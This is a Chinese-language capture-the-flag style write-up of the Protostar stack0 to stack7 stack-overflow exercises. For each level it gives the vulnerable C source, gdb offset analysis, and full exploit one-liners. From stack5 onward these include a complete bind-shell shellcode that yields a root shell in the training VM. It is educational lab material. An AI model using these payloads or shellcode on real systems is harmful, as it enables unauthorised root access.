Protostar Stack0
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
思路:buffer溢出改變modified的值
$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable
Protostar Stack1
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改變modified的值爲0x61626364
$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value
Protostar Stack2
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改變modified的值爲0x0d0a0d0a,而buffer是從環境變量GREENIE複製過來的,所以設置一下該環境變量就好。
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2
you have correctly modified the variable
這是在自己本地的Ubuntu 16.04下的執行結果
但在protostar虛擬機裏,執行失敗
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name
不給設置這樣的變量名
不服,寫個腳本試試
import os
os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')
$ python se.py
you have correctly modified the variable
OK
Protostar Stack3
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
思路:查安全機制
$ checksec stack3
[*] '/home/jc/pwn/stack3'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什麼都沒開,那麼只需要反彙編看一下win的地址,利用buffer溢出就好
$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
0x08048424 <+0>: push ebp
0x08048425 <+1>: mov ebp,esp
0x08048427 <+3>: sub esp,0x18
0x0804842a <+6>: mov DWORD PTR [esp],0x8048540
0x08048431 <+13>: call 0x8048360 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
找到win()的地址爲0x08048424,編寫payload過關
$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
Protostar Stack4
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
代碼真簡潔!
思路:溢出buffer,造成崩潰,找到rip被覆蓋的偏移量,放入win()的地址
$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA
Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
覆蓋eip的偏移量爲76
gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>
win()的地址爲0x80483f4
$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault
Protostar Stack5
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
思路:檢查安全機制
$ checksec stack5
[*] '/home/jc/pwn/stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什麼也沒開,所以,應該可以控制eip,執行shellcode。找到一個shell_bind_tcp 的shellcode,共89字節,端口號爲1337。
生成長度爲200的測試字符串
$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
運行
gdb-peda$ r
Starting program: /home/jc/pwn/stack5
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
eip崩潰在0x41344141(‘AA4A’)
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
偏移量爲76
此時esp的地址爲0xffffcec0,也是我們控制eip要轉到的地址,內容爲
AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
長度爲120,可以容納89字節的shellcode,還可以在shellcode前執行一段nop指令。構造payload:’A’*76+shellcode地址+shellcode
echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
Segmentation fault!查看core
gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffceff in ?? ()
查看0xffffceff附近的存儲情況
gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf07: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf0f: 0x90 0x6a 0x66 0x58
我們的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload
echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
還是Segmentation fault!再查看core
$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x90ffffcf in ?? ()
查看附近內存
gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x6a
0xffffcf10: 0x66 0x58 0x6a 0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41 0x41 0x41 0x41 0xcf 0xff 0xff 0x90
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90
發現我們的設置的返回地址0xffffcf00中的\x00字節不在內存中,悟了!\x00字節發送不了!但是我設了16個字節的nop,返回地址往後移1到16位都行,對吧?就移1位好了,修改返回地址爲0xffffcf01
echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc
成功!
protostar虛擬機裏的esp的地址:0xbffffcc0
$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root
protostar虛擬機裏沒有發現gdb與直接運行時esp不一致的問題
Protostar Stack6
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}
返回地址被限制不能在棧中我們可操作的部分
思路:雖然被限制了,但只是限制了getpath函數的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此時只要在棧頂設置好shellcode的地址,就可以繞過限制
$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80
這次getpath()的返回地址偏移量爲80
gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84
棧指針地址爲0xffffceb0,偏移量爲84
構造payload:’A’*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
Segmentation fault (core dumped)
Segmentation fault!查看core文件
$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffcebd in ?? ()
查一下附近的存儲情況
gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00 0x70 0xfb 0xf7 0x41 0x41 0x41 0x41
0xffffce80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffcec0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcec8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffced0: 0xb4 0xce 0xff 0xff 0x90 0x90 0x90 0x90
0xffffced8: 0x90 0x90 0x90 0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4
發現問題了:我們第二次的返回地址應該是0xffffced4,而不是0xffffceb4
而且在連續存儲64個A之後,出現了有4個A被替換的情況,此處不解,路過的friend懂的希望不吝賜教
修改payload
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc
上面是在本機Ubuntu上折騰的結果。在protostar的虛擬機上,同樣棧指針的地址要加32個字節。獲得的esp地址是0xbffffd20,本來+4就是0xbffffd24,但是要再加32個字節變成0xbffffd44纔是正解。
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
我嘗試了在gdb裏執行payload,發現gdb裏是不用加32字節的,難道是gdb與系統直接運行的區別?
Protostar Stack7
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
char *getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xb0000000) == 0xb0000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
return strdup(buffer);
}
int main(int argc, char **argv)
{
getpath();
}
思路:和stack6一樣的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4
$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
小結
失敗不可怕,可怕的是不去找出失敗的原因。